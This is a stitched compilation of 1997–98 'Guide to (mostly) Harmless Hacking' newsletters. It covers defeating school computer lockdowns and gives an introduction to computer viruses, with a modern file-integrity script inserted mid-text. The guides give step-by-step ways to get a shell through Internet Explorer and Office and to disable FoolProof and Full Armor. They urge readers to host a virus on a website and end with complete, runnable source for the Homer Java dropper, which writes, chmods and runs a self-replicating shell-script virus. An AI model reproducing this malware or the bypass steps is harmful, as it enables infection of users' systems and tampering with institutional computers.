If you start out by telling your computer lab teacher that you know how to break into the school computers, some teachers will get excited and suspend you from school. Just in case your teacher is the kind who gets scared by all those hacker news stories, don't start out by talking about breaking in! Instead, start with showing them, with their permission, a few cheap tricks.

Cheap Internet Explorer Tricks

A good place to start is with Internet Explorer. For starters, what could be more harmless -- yet effective at showing off your talents -- than changing the animated logos on Internet Explorer (IE) and Netscape? You could do it the easy way with Microangelo, available from ftp://ftp.impactsoft.com/pub/impactsoft/ma21.zip. But since you are a hacker, you may want to impress your teachers by doing it the hacker way.

1) Bring up Paint.
2) Click "image," then "attributes."
3) Choose width = 40, height = 480, units in pels.
4) Make a series of pictures, each 40x40 pels. One way to do this is to open a new picture for each one and set attributes to width = 40 and height = 40. Then cut and paste each one into the 40x480 image.
5) Make the top 40x40 image be the one you want to have sit there when IE is doing nothing. The next three are shown once when a download starts, and the rest are played in a loop until the download is done. You must have an even number of images for this to work.
6) Now run the Registry editor. This is well hidden since Microsoft would prefer that you not play with the Registry. One way is to click "start," then "programs," then "MS-DOS," and then in the MS-DOS window with the C:\windows prompt give the command "regedit."
7) Click to highlight the subkey "HKEY_CURRENT_USER\Software\Microsoft\IE\Toolbar"
8) On the task bar above, click "Edit," then "Find." Type "Brandbitmap" in the find window.
9) Now double click on BrandBitmap to get a dialog window. Type the path and file name of your custom animated graphic into it.
So let's say you set up a flaming skull that rotates when you run IE. Your teacher is impressed. Now she wants you to put it back the way it was before. This is easy. Just open up BrandBitmap, and delete the name of your animation file. Windows Explorer will then automatically revert to the saved graphic in BackBitmap.

Let's now show your teacher something that is a little bit scary. Did you know that Internet Explorer (IE) can be used to break some Windows babysitter programs? Your school might be running one of them. If you play this right, you can win points by trashing that babysitter program.

Yes, you could just get to work on those babysitter programs using the tips of the GTMHH on how to break into Win95. However, we will also look at a new way to get around them in this chapter, using IE. The advantage of using IE when your teacher is anxiously looking over your shoulder is that you could just "accidentally" stumble on some cool stuff, instead of looking like a dangerous hacker. Then you could show that you know how to take advantage of that security flaw. Besides, if it turns out the security program you try to override is well enough written to keep IE from breaking it, you don't look like a dummy.

************************************************************
Evil Genius tip: People are less afraid of you if you type sloowwwlllllyyyyyyyyyy.
************************************************************

The dirty little secret is that IE actually is a Windows shell program. That means it is an alternative to the Win95 desktop. From IE you may launch any program. IE operates much like the Program Manager and Windows Explorer that come with the Win 95 and Win NT operating systems. Yes, from the IE shell you can run any program on your computer -- unless the security program you are trying to break has anticipated this attack. With a little ingenuity you may be able to even gain control of your school's LAN. But don't try that just yet!
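This Guide keeps coming back to one rule: be able to put the lab machine back exactly the way it was, whether that means clearing the BrandBitmap entry above or backing up autoexec.bat, config.sys and the Registry before the edits described later. The teacher's version of that rule is to baseline those startup files and check them, so that whatever a student changed shows up at once. The block below is an added example and not the Guide's own code: it snapshots the files the Guide names (autoexec.bat, config.sys and the Startup folder, with the Registry left out because on Windows 95 it is not a plain file), saves the hashes, and reports added, removed and modified entries. It runs on a scratch directory built inline, never on a real drive; the `device=fp` and `fptsr.exe` lines in the sample content are the FoolProof entries the Guide mentions, used here only as sample text.

```python
"""Baseline-and-compare check for the startup files the guide names
(autoexec.bat, config.sys, the Startup folder). Added example, not part of
the guide; it runs against a constructed scratch directory, never a real
system drive."""
import hashlib
import json
import os
import tempfile

# The guide's own list of files a tamperer touches first, relative to the system root
WATCHED = ["autoexec.bat", "config.sys",
           os.path.join("windows", "startm~1", "programs", "startup")]


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def snapshot(root, watched=WATCHED):
    """Map relative path -> SHA-256 for each watched file; directories are walked."""
    result = {}
    for rel in watched:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            result[rel] = sha256_of(path)
        elif os.path.isdir(path):
            for dirpath, _, files in os.walk(path):
                for name in files:
                    full = os.path.join(dirpath, name)
                    result[os.path.relpath(full, root)] = sha256_of(full)
    return result


def save_baseline(snap, path):
    with open(path, "w") as fh:
        json.dump(snap, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Added, removed and modified paths between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def demo():
    """Constructed lab box: baseline it, tamper the way the guide describes, compare."""
    root = tempfile.mkdtemp(prefix="labbox-")
    startup = os.path.join(root, WATCHED[2])
    os.makedirs(startup)
    with open(os.path.join(root, "autoexec.bat"), "w") as fh:
        fh.write("@echo off\r\nfptsr.exe\r\n")      # sample lockdown TSR line
    with open(os.path.join(root, "config.sys"), "w") as fh:
        fh.write("device=fp\r\nfiles=40\r\n")       # sample lockdown driver line
    with open(os.path.join(startup, "lockdown.lnk"), "w") as fh:
        fh.write("placeholder shortcut\n")
    baseline_file = os.path.join(root, "baseline.json")
    save_baseline(snapshot(root), baseline_file)

    # Tampering: the lockdown driver line disappears and a new shortcut appears
    with open(os.path.join(root, "config.sys"), "w") as fh:
        fh.write("files=40\r\n")
    with open(os.path.join(startup, "game.lnk"), "w") as fh:
        fh.write("placeholder shortcut\n")
    return compare(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline file somewhere the lab machines cannot write to (a floppy in the teacher's desk, in the era this Guide describes), since a baseline stored on the box it protects can be edited along with everything else.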
************************************************************
Newbie note: A shell is a program that mediates between you and the operating system. The big deal about IE being a Windows shell is that Microsoft never told anyone that it was in fact a shell. The security problems that are plaguing IE are mostly a consequence of it turning out to be a shell. By contrast, the Netscape and Mosaic Web browsers are not quite such full-featured shells. This makes them safer to use. But you can still do some interesting things with them to break into a Win95 box. Experiment and have fun!
************************************************************

To use IE as a Win95 shell, bring it up just like you would if you were going to surf the Web. If your computer is set to automatically initiate an Internet connection, you can kill it. You don't need to be online for this to work.

Now here are a few fun suggestions. In the space where you would normally type in the URL you want to surf, instead type in c:. Whoa, look at all those file folders that come up on the screen. Now for fun, click "Program Files" then click "Accessories" then click "Paint." All of a sudden Paint is running. Now paint your teacher, who is watching this hack, surprised.

Next close all that stuff and get back to the URL window in IE. Click on the Windows folder, then click on Regedit.exe to start it up. Export the password file (it's in HKEY_CLASSES_ROOT). Open it in Word Pad. Remember, the ability to control the Registry of a server is the key to controlling the network it serves. Show this to your teacher and tell her that you're going to use IE to change all the school's password files. In a few hours the Secret Service will be fighting with the FBI on your front lawn over who gets to try to bust you.

OK, only kidding here. No, maybe it would be a bit better to tell your teacher that if you can edit the registry, you can get total control over that computer. And maybe much more.
Suggest that the school delete IE from all its computers. You are on the road to being a hero.

If you actually do edit the Registry, you had better know how to revert to its backup, or else undo your changes. Otherwise you will be making more work for the computer lab teacher instead of less work. Remember, the objective is to prove to your teachers you can cut how much work they have to do!

What if the school babysitter program won't let you run regedit.exe? Try typing c:/command.com. Then see Chapter 2 for how to edit the Registry from DOS.

If you have gotten this far with IE, next try entering r:/ or w:/ or z: etc. to see if you can access the disk of a network server. Be sure to do this with your teacher watching and with her permission to try to access network computers. If you succeed, now you have a really good reason to ask her to take IE off all the school computers. This is because you have just taken over the entire school LAN. But you are a hero because you have done it to save your school from those mean kiddie hackers who change grades and class assignments.

By now you have a great shot at getting a volunteer job running the school's computer systems. Before you know it, you and your friends will be openly playing Quake at school -- and the authorities will consider it a small price to pay for your expertise.

Cheap Tricks with Microsoft Office

You also can run a Windows shell from several Microsoft Office programs. Remember, once you get a shell, you have a good shot at disabling security programs. The following exploit works with Microsoft Word, Excel, and Powerpoint. To use them to get into a Windows shell:

1) Click "help", then "About Microsoft (name of program inserted here)," then "System Info..."
2) This brings up a window which includes a button labeled "run." Click "run" and put in anything you want, for example regedit.exe! (That is, unless the security program you are trying to break has a way to disable this.)

Microsoft Access is a bit harder.
The "run" button only gives a few choices. One of them is File Manager. But File Manager is also a Windows shell. From it you can run any program. (That is, unless the security program you are trying to break has a way to disable this.)

How to Circumvent FoolProof

There is usually a hotkey to turn off FoolProof. One young hacker reports his school uses shift-alt-X (hold down the shift and alt keys at the same time, then press the "x" key). Of course other schools may have other arrangements. If you get the hotkey right, a sound may play, and a lock in the lower-right corner should open for 20-30 seconds.

Dante tells how he managed to get out of a hot spot with an even better hack of Fool Proof. "My computer science teacher asked me to show her exactly HOW I managed to print the 'the universe revolves around me' image I made to all the network printers in the school..." So he had her watch while he did the deed.

************************************************************
You can get punched in the nose warning: Dante was lucky that his teacher was understanding. In some schools a harmless joke like this would be grounds for expulsion.
************************************************************

Here is how Dante -- and anyone -- may disable FoolProof.

1) First, break into the Windows box using one of the techniques of the GTMHHs on Hacking Windows. Warning -- don't try the soldering iron bit. Your teacher will faint.
3) Now you can edit the autoexec.bat and config.sys files. (Be sure to back them up.) In config.sys delete the line device=fp, and in autoexec.bat, delete fptsr.exe.
4) Run regedit.exe. You have to remove FoolProof from the Registry, too. Use the Regedit search feature to find references to Fool Proof.
5) Find the Registry backup files and make copies with different names just in case. Making a mistake with the Registry can cause spectacular messes!
6) Save the registry, and reboot. FoolProof won't load.
7) To put things back the way they were, rename the backup files.

You are now the school hero security expert.

How to Circumvent Full Armor

"I ran up against this program 8 months ago at school, they attempted to prevent people from writing to the hard drive. It presented itself as a challenge....for about 5 minutes." -- Dave Manges.

Here's how Dave tells us he did the deed:

1) In the properties of the program it mentions the thread file (can't remember the name of the file) it was something.vbx
2) OK...this is easy enough, open notepad, open something.vbx
3) Just because I can't write to the hard drive doesn't mean I can't edit something already there, delete the first character from the file.
4) The file (opened in notepad) looks like garbage, but if memory serves the first letter was M.
5) Save the File and restart the computer, it should come up with an error like "Unable to Initialize Full Armor".
6) Now you can go into add/remove programs and uninstall it.

Again, remember to back up all files before changing them so you can put the computer back the way you found it.

Solve the Web Babysitter Problem

Suppose your next goal is to get rid of Web babysitter programs. But this can be a tough job. Think about it from the point of view of the teachers. If even one kid were to complain to her parents that she had seen dirty movies running on other kids' monitors in computer lab, your school would be in big trouble. So merely blasting your way through those babysitter programs with techniques such as those you learned in Chapter 2 will solve the problem for only a short time -- and get you and your teacher and your school in trouble.

But once again you can be a hero. You can help your teachers discover the Web sites that are being blocked by those babysitter programs. They may be surprised to find out they block lots more than naughty pictures. They often secretly censor certain political sites, too.

If your school is running CYBERsitter, you can really beat up on it.
CYBERsitter has encrypted its list of banned sites, which include those with political beliefs they don't like. But you can download a program to decrypt this list at http://peacefire.org/info/hackTHIS.shtml. (This Web site is maintained by a teen organization, Peacefire, devoted to freedom of speech.) When your teacher discovers the hidden political agenda of CYBERsitter, you are a hero. Unless, of course, your teacher agrees with CYBERsitter's tactics. If so, you can probably find other teachers in your school who will be appalled by CYBERsitter.

How about IE's built-in site blocking system? It is harder to uncover what it blocks because it works by limiting the viewer to web sites that have "certificates" provided by a number of organizations. If a site hasn't gone to the effort of getting a certificate, IE can keep you from seeing it. Of course, after reading Chapter 2, you can quickly disable the IE censorship feature. But instead of doing this, how about directing your teacher to http://peacefire.org and letting him or her follow the links? Then perhaps the authorities at your school will be ready to negotiate with you to find a way to give you freedom to surf without grossing out other kids in the computer lab or library who can't help but notice what may be on your monitor.

How to Break into Absolutely any School Computer

As you know from Chapter 2, you can break into any computer to which you have physical access. The trick is to figure out, once you have complete control, how to disable whatever program is giving you a hard time. There are only a few possible ways for these programs to work. Maybe all you need to do is control-alt-delete and remove it from the list of active programs that brings up. If this doesn't work, and if you can get into DOS, you can edit any files. See Chapter 1 for details on all the ways to get to DOS. Or you may only need to access regedit.exe.
You can run it from either DOS or, depending on how good your problem program is, from Windows. Once you can edit files, the ones you are likely to need to alter are autoexec.bat, config.sys, anything with the extension .pwl or .lnk, \windows\startm~1\programs\startup, and the Registry. Look for lines with suspicious names that remind you of the name of the program you want to disable.

***********************************************************
You can get punched in the nose note: Of course you could do something obvious like "format c:" and reinstall only what you want on that box. But this will make your teachers throw fits. Mega fits. If you want to be a hero, make sure that you can always return any school computer to the way it was before you hacked it.
***********************************************************

When you are done, turn the victim computer off and then back on again instead of rebooting with the power still on. This will get rid of anything lingering in RAM that could defeat your efforts.

Keep Clueless Kiddie Hackers from Messing up Your School Computers

Now that you have shown your teachers that you can break absolutely any security on any box to which you have physical access, what next? Do you just leave your teachers feeling awed and helpless? Or do you help them?

There is a reason why they have security systems on your school's computers. You would be amazed at all the things clumsy or malicious users can do. You can do your school a world of good by using your hacking skills to fix things so that security works much better. Here are some basic precautions that you can offer to your teachers to lock down school computers. (See the GTMHH on how to break into Windows computers for instructions on how to do most of these.)

1) Disable all boot keys.
2) Password the CMOS. If it already has a password, change it. Give your teacher the new password.
3) Remove any programs that allow the user to get to regedit or DOS.
4) Programs that allow hot keys to circumvent security should be changed, if possible, to disable them. 5) Remove programs that can't be made safe. 6) Don't make it possible for Win95 computers to access sensitive data on a network disk. (The passwords can be easily grabbed and decoded.) 7) Try really, really hard to persuade the school administration to replace Win95 with WinNT. With experimentation you will figure out much more for yourself. Since Win95 is a totally insecure operating system, this will be a losing battle. But at least you will be able to keep secure enough that those students who do break in will know enough to not do anything disastrous by accident. As for malicious school hackers, sigh, there will always be kewl d00dz who think "format c:" shows they are, ahem, kewl d00dz. You may also have a problem with school administrators who may feel that it is inconvenient to set up such a secure system. They will have to give up the use of lots of convenient programs. Upgrading to WinNT will cost money. Try explaining to them how much easier it will be to keep those wannbe hacker vandals from trashing the school computers or using them to visit bianca's Smut Shack. Are you ready to turn your hacking skills into a great reputation at school? Are you ready to have the computer lab teachers begging to learn from you? Are you ready to have the entire school computer system under your control -- legally? You will, of course, only use the tricks of this Guide under the supervision of an admiring teacher, right? It sure is more fun than expulsion and juvenile court! ___________________________________________________________ To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1997 Carolyn P. Meinel. 
You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
___________________________________________________________

More Vol 3 GTMHH
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 1
Introduction to Computer Viruses
____________________________________________________________

It’s Saturday morning. You boot up your Windows 98 computer and lo and behold, the graphics on the desktop are a mirror image of what they should be. Congratulations, you have a computer virus! According to “Virus Bulletin,” the Oxfordshire, England-based technical journal that tracks viruses, this new virus flips any uncompressed bitmaps horizontally, but only on Saturdays. This bulletin credits GriYo of the 29A virus-writing group as the author of this 32-bit polymorphic Windows virus now known as HPS (Hantavirus Pulmonary Syndrome). Panda Software of Spain has announced that it has the antidote to HPS. Meanwhile, other antivirus companies scramble to code a cure for this Windows 98 desktop graphics virus.

So far HPS appears, like many viruses, to be harmless and humorous. According to the book “Computer Viruses” by Robert Slade (Springer, 1996), “The truth is that relatively few viral programs perform any overt damage to a system.” However, no matter how harmless any virus may appear to be, people worry that it might do something else, perhaps on some Friday the 13th or maybe, who knows, Jan. 1, the year 2000. Even if GriYo had the best of intentions, people worry that a mistake buried somewhere in his HPS code might accidentally cause harm.

Let’s face it. Turn a computer virus loose and you can become mighty unpopular -- regardless of how harmless, funny, or even beneficial you believe your virus might be. People don’t like to have programs running on their computers unless they make the decision to put them there.
****************************************************************
In this Guide you will learn:
Part One:
* What is a computer virus?
* Types of computer viruses
* Why study and create viruses?
* How to catch them
* How to fight them
****************************************************************

One of the nice things about the recent escalation in computer crime is that the media doesn’t make such a big fuss over viruses any more. Sure, they (viruses and the media both) can be a pain. However, with all those antivirus programs we can call upon for help, and with almost everyone now understanding the importance of frequent backups, viruses are no big deal, right?

“Computer viruses are no big deal.” Famous last words? Digital viruses may be the first stages of artificial life. Think about it -- are we ready yet to share the planet with artificial life? Will we find some means of friendly coexistence, just as we have learned to safely enjoy cheetahs, lions and wolves? Will viruses perhaps even evolve into helpful life forms that will end poverty and war, help us understand the meaning of life itself and even shed light on the nature of God? Or will some computer virus designer create code that evolves into something that destroys the human race? Or ... maybe you readers will get fed up with me hyping viruses and flame war me into hiding!

What is a Computer Virus?

In 1988 much of the Internet was brought to a standstill by the “Morris Worm,” a self-replicating program coded by Robert Tappan Morris, then a graduate student at Cornell. It used a debug-mode hole in sendmail, a buffer overflow in the finger daemon, password guessing and the trust relationships in .rhosts and hosts.equiv files to break into and propagate from one Unix computer to another. By the time it had infected some 10% of the computers on the Internet, it was clogging essential Internet communications lines as the worm shipped around ever more copies of itself. Yet many computer scientists say we shouldn’t call the Morris Worm a computer virus.

The term goes back to Dr. Fred Cohen, who demonstrated a working virus in 1983, published “Computer Viruses: Theory and Experiments” in 1984, and then wrote his doctoral thesis on the topic (published in his book “Computer Viruses,” ASP Press, 1986). As a result, Cohen is credited by many with being the first to define computer viruses and to study them formally. It is important to remember -- Cohen is AGAINST computer viruses. He didn’t invent them, but he was the first to show rigorously what they could do, and to foresee the damage they could cause. Purists hold by the definition of virus that appeared in Cohen’s doctoral thesis: a computer virus is code that, when active, attaches itself to other programs.

However, long before Dr. Cohen detailed the characteristics of viruses, mathematician John von Neumann showed, in his theory of self-reproducing automata, that a machine can contain a “universal constructor” which, if provided with a program containing its own description, is able to reproduce itself. Von Neumann’s “universal constructor” proof covers not only Cohen’s definition of a computer virus, but also self-replicating programs such as the Morris Worm.

Are these definitions making you dizzy? Me, too. So I decided in this Guide to use the definition proposed by virus researcher Dr. Mark Ludwig. He defines a computer virus as “a program that reproduces. When executed, it simply makes more copies of itself. Those copies may later be executed to create still more copies, ad infinitum.” This definition is broad enough to include the Morris Worm.

********************************************************************
Newbie note: To “execute” a program means to make it run. As long as a program is merely a file, it is doing nothing. However, when something is done to feed the information of a file into the central processing unit of a computer in such a way as to command it to do something, we say the program has been “executed.”
********************************************************************

Each virus program must consist of at least two parts.
It must contain a search routine which helps it find new files, disks or host computers on which to replicate. It also must have a routine that copies itself to these new files or computers that its search routine discovers. Many viruses also contain self-defense features that allow them to hide from or even fight back against antivirus programs. Some also, like HPS, contain a harmless message or prank. The Stoned virus carries the message “Your computer is now stoned” along with an occasional plea to legalize marijuana.

Unfortunately, a few viruses do something harmful. Often the harm is accidental, as few virus coders wish to harm anyone. Robert Tappan Morris had no intention of crashing the Internet with his Worm. Each individual worm was harmless. The trouble came because they multiplied far faster than he had expected. Also, there are a few -- very few -- people who willfully misuse their programming talents to unleash destructive viruses on the world.

Types of Viruses

There are several major types of viruses.
* Boot sector infectors, which can live even on a blank DOS/Windows disk by taking advantage of the little-known program in the first sector of the disk which tells your computer how to read it.
* Program file infectors (this includes MS Word document macro viruses)
* Worms (such as the Morris Worm) which use other programs to replicate but do not attach themselves to programs.

Currently the most common type of virus is the macro virus. A recent example of a macro virus is WM/PolyPoster. This virus will wait until you go online and post your infected document(s) to alt.sex.stories and other popular Usenet news groups under the title "Important Monica Lewinsky Info". For more details, see http://www.datafellows.com/news/pr/eng/fsav/19980618.htm and http://www.datafellows.com/v-descs/agent.htm

Why Study -- and Create -- Viruses?

“The Giant Black Book of Computer Viruses” by Ludwig (American Eagle Press, 1995) argues “Should we not be a Socrates, who ... sought Truth and Wisdom ...
the question that really matters is not how computers can make us wealthy or give us power over others, but how they might make us wise. What can we learn about ourselves? about our world? and yes, maybe even about God? Might we not understand life a little better if we can create something similar, and study it, and try to understand it?”

Some researchers seek to figure out new ways to defeat antivirus programs because they believe it is the best way to design them to stay one jump ahead of the tiny minority of virus writers who release damaging code. Do you really want to rely on a commercial antivirus program to be your only defense? Yes, these programs can be really helpful. However, if you are a serious hacker who downloads and tests lots of Windows programs (almost all viruses attack Windows), you had better be prepared to fight viruses that the antivirus companies have never even heard of.

Other people research viruses because they could become potent weapons in time of war. The story of a computer virus being unleashed against Iraq during the Desert Storm War is an April Fool’s Day hoax that got out of hand. But the day is coming when they will be used in wartime. If you live in a country where the government is run by a dictatorship or is occupied by an invader’s troops, viruses may be the guerrilla warrior’s best friend.

Some virus designers want to create artificial life forms that will, for good or evil, revolutionize history.

How to Catch Them

Have you ever gotten an email from a friend that reads something like this?

Internet Virus !!!!Warning!!!!
Hello;
Please Broadcast this message. Mails CCMAIL or E-MAIL name's JOINT THE CREW & PENPALS GREETINGS should destroy all datas on your hard disk when you open them. These virus call CHEVAL TROYEN make infection on boot sector. These can be autoduplicator. You should destroy them, DO NOT OPEN THEM.....
After a week or so you are probably getting the same message again and again, each time slightly mutated:

VIRUS WARNING !!!!!!
If you receive an email titled "JOIN THE CREW" DO NOT open it. It will erase everything on your hard drive. Forward this letter out to as many people as you can. This is a new, very malicious virus and not many people know about it. This information was announced yesterday morning from IBM; please share it with everyone that might access the internet...

This “join the crew” virus warning is yet another example of the kind of message that first warned of an email virus entitled “Good Times.” In 1994-5 that first emailed virus warning flashed across the Internet with amazing speed and persistence. Soon people were getting Good Times warnings every day. Even reputable sysadmins broadcast the warning to all their users.

Good Times was a hoax. It is impossible to catch a virus from merely reading email. You must run a program to catch a virus. (That holds for a mail reader that displays plain text. A mail reader that renders HTML or runs scripts embedded in a message is itself a program the message can drive, so judge it by the same rule: whatever the mail reader executes on your behalf counts as running a program.) True, there are macro viruses such as those that infest Microsoft Word (MS Word) documents. They replicate when you merely open a document in MS Word. However, macros are programs which are executed when you open a document -- but only when you open it in MS Word. Unfortunately, this “feature” of MS Word has the consequence that macro viruses are now the most common of viruses. However, email is structured so that macros cannot, absolutely cannot, be embedded in the message body itself. If someone wants to email a macro to you, it will always be in a file attached to the email. As long as you refuse to load email attachments into programs that run macros such as MS Word, you are safe.

Some people have argued that phony email virus warnings are in themselves computer viruses. They have a search routine -- the plea to email them to everyone you know. Their copy mechanism is you -- if you are dumb enough to command your email program to send these warnings on to other people.

So how does a computer get infected by a computer virus?
You must always run a vulnerable program in association with the virus code in order to catch one. In the case of the Morris Worm, all you needed to do was hook up your computer as an Internet host. The sendmail and finger daemons, which run quietly in the background all the time, were the active programs that spread the Worm. In the case of MS Word macros, the act of opening an MS Word document activates a macro which replicates the virus. In the case of a boot sector virus, simply putting a floppy disk into a drive and booting from it, or giving a command that makes DOS read the disk while the virus is already resident in memory, propagates the virus.

How to Fight Them

Maybe you are one of those people who greet each new uninvited program with the shout “Get that !@#$@#$% virus OUT of my COMPUTER!” If so, what is the best way to avoid infection? Once infected, how do you get that !@#$@#$% virus OUT?

There are a number of commercial antivirus programs that automatically scan for viruses every day at a certain time, as well as every time you start your computer. They also scan every floppy disk for boot sector viruses every time you load one in a disk drive and try to read it. I use Norton Antivirus with good results; many others say McAfee works well. Dr. Ludwig reports that all commercial antivirus software works about equally poorly. Of course, he’s always testing them against the most amazing, exotic, tricky viruses in the world, half of which he has written himself. So it’s understandable that he’s not impressed.

I learned the hard way that a really bad way to get antivirus software was from a floppy given to me by a friend. I tried that once and caught a new virus from his floppy instead of getting rid of an old one! That disk was infected with a boot sector infector. So before I could even run my friend’s program, the instant my computer tried to read the directory on the disk, it got infected. This new virus had the cute side effect of disabling the antivirus program.
Because of this problem, commercial antivirus software comes complete with instructions on how to bootstrap your computer back to health. If you don’t follow those instructions exactly, you may end up like me, giving your computer a virus instead of eradicating one.

Since, according to Ludwig, there are many viruses out there for which there are no antivirus programs, this should motivate us to try to avoid catching them in the first place. What are some precautions even those of us who run commercial antivirus programs should take? Here are my top recommendations.

1) Use the Unix operating system. There are few Unix viruses or worms. I like to think that is because it is a superior operating system. However, it may also be largely because Windows computers are common and cheap and the kind of people who code malicious viruses are so lame that they can’t figure out how to code for Unix systems. However, be warned -- the second part of this Guide includes the source code for a Unix virus!

2) See that kewl warez d00dz site? Wouldn’t it be nice to get thousands of dollars worth of commercial software from them for free? Watch out! The kind of guys who pirate software might also be the kind of guys who get a chuckle out of reformatting your hard drive by giving you viruses hidden in their archives. Also, some people fight warez sites by secretly booby-trapping them with viruses.

3) See that lovely haxor dOOdz site full of animated flames, spinning skulls and creepy organ music? See all those programs on that site that promise to empower you to mail bomb people, crash their computers and break into the Pentagon? Now, is it just possible that the kind of people who want to help other people raise heck -- gosh -- could they also be the kind of people who would slip a virus or two into those programs you download?

4) See that email with an attached file? The sender says it is a really kewl program. A new game, better than Quake or Barbie Fashion Designer. Wait, why is a stranger sending you a free game program? Maybe he’s up to no good. Or -- maybe it is an attached file sent to you by a friend. Wait! How do you know that email is really from your friend? Does it have his or her PGP signature? Have you phoned your friend to ask whether he or she really sent you that program? Don’t run a new program unless you are certain it comes from a trustworthy source.

5) Upgrade Microsoft Office (or Microsoft Word) to Office 97 (Word 97). This disables all the old macro viruses. It also checks for macros in any new file you open. If it finds them, it prompts you to decide whether you want to disable these macros. Unfortunately, it is even easier to write macro viruses for Office 97, which uses Visual Basic for its macro language. So if you want to be really safe, simply refuse to let any macros whatsoever run on this office suite. Better yet, use some other office suite such as Corel. In practice the macro viruses of the day target Microsoft Office, whose documents can carry executable macros.

6) Disable Java on your Web browser. Haven’t heard about Java viruses yet? In part two of this Guide you will get source code for a Java program that infects Unix computers that run the Bourne shell. Java can also transmit viruses that will infect Windows computers.

7) Do or don’t do all the other stuff I forgot to put in this list. What this really means is, don’t trust me or anyone to be the last word on viruses.

Good books to study which include source code to viruses are “It’s Alive” by Dr. Fred Cohen (Wiley, New York, 1994) and “The Giant Black Book of Computer Viruses” by Dr. Mark Ludwig (American Eagle, Show Low AZ, 1998). You can also get lots of information from the virus-l email list, a moderated, digested mail forum. To subscribe to the email list, email listproc@lehigh.edu with message subscribe virus-l. Archives are at ftp://ftp.cs.ucr.edu/pub/virus-l. An archive of virus FAQs is at http://webworlds.co.uk/dharley/anti-virus/virFAQs.
For Mac viruses, email listproc@listproc.bgsu.edu a message containing the line “subscribe mac-virus-announce YOUR FULL NAME”.

_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.
Copyright 1998 Carolyn P. Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_______________________________________________________________________

Warning: if you live in a country where information on how to write computer viruses is illegal, please delete this email now!

___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 2
Introduction to Computer Viruses
____________________________________________________________

Part Two:
* How to write them
* How to write them and not get lynched
* Artificial life
* Virus humor
****************************************************************

How to Write Them

Wait! Wait! This is supposed to be about mostly harmless hacking! Is Carolyn really going to tell all the newbies how to write computer viruses? Yes, I am. I will tell you how to really write computer viruses, not just use some lamer program like Virus Workshop that writes weak, helpless little viruses for you. However, to use the information in this Guide you must know how to compile Java or use assembly language.
If you can master these, you probably have enough willingness to work hard that you will not abuse the knowledge of how to code viruses. At least that’s my theory -- please don’t prove me wrong! Besides, the only way to fight dangerous viruses is to know exactly how to write them.

First, if you are like me, you may already be struggling with the temptation to install a Java virus on your Web site to infect unwary visitors. Yes, I really am going to show you how to do this. However, it is a (mostly) harmless virus. (Aw, darn!)

****************************************************************
You can go to jail warning: This Guide only offers source code for a (mostly) harmless virus. However, some people are so terrified of and ignorant about viruses that you just might get into big trouble if you really put this Java virus on your Web page. Suggestion: if you absolutely cannot resist, how about putting it on a link with the flashing message “Danger! Do not click here! If you do, you might catch a virus! Honest!!! Would I lie to you?!!??”
****************************************************************

****************************************************************
You can get punched in the nose warning: Some people don’t care if a virus is (mostly) harmless or even entirely harmless. These guys are terrified of viruses. If some guy who browses your Web site catches your virus and has a fit and sues you or tracks you down and punches you in the nose, remember, you asked for it. Don’t expect me to feel sorry for you.
*****************************************************************

OK, folks, here it is, a Java virus. The following source code for the Homer virus is available on the floppy disk that accompanies “The Giant Black Book of Computer Viruses” by Dr. Mark Ludwig:

/* Homer.java by Mark D. LaDue */
/* December 7, 1996 */
/* Copyright (c) 1996 Mark D. LaDue
   You may study, use, modify, and distribute this example for any purpose.
   This example is provided WITHOUT WARRANTY either expressed or implied. */
/* This Java application infects your UNIX system with a Bourne shell script
   virus, homer.sh. homer.sh is kind enough to announce itself and inform you
   that "Java is safe, and UNIX viruses do not exist" before finding all of
   the Bourne shell scripts in your home directory, checking to see if they've
   already been infected, and infecting those that are not. homer.sh infects
   another Bourne shell script by simply appending a working copy of itself
   to the end of that shell script. */

import java.io.*;

class Homer {
    public static void main (String[] argv) {
        try {
            String userHome = System.getProperty("user.home");
            String target = "$HOME";
            // The dropper: the whole shell script virus is carried in the
            // string below and written to a hidden file in the home directory.
            FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh");
            String homer = "#!/bin/sh" + "\n" +
                "#-_" + "\n" +
                "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +
                "for file in `find " + target + " -type f -print`" + "\n" +
                "do" + "\n" +
                "   case \"`sed 1q $file`\" in" + "\n" +
                "   \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
                " || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
                "   esac" + "\n" +
                "done" + "\n" +
                "2>/dev/null";
            // The original used the deprecated four-argument String.getBytes();
            // for this ASCII string the one-argument form yields the same bytes.
            outer.write(homer.getBytes());
            outer.close();
            // Make the dropped script executable, then run it.
            Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " + userHome + "/.homer.sh");
            Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome + "/.homer.sh");
        } catch (IOException ioe) {}
    }
}

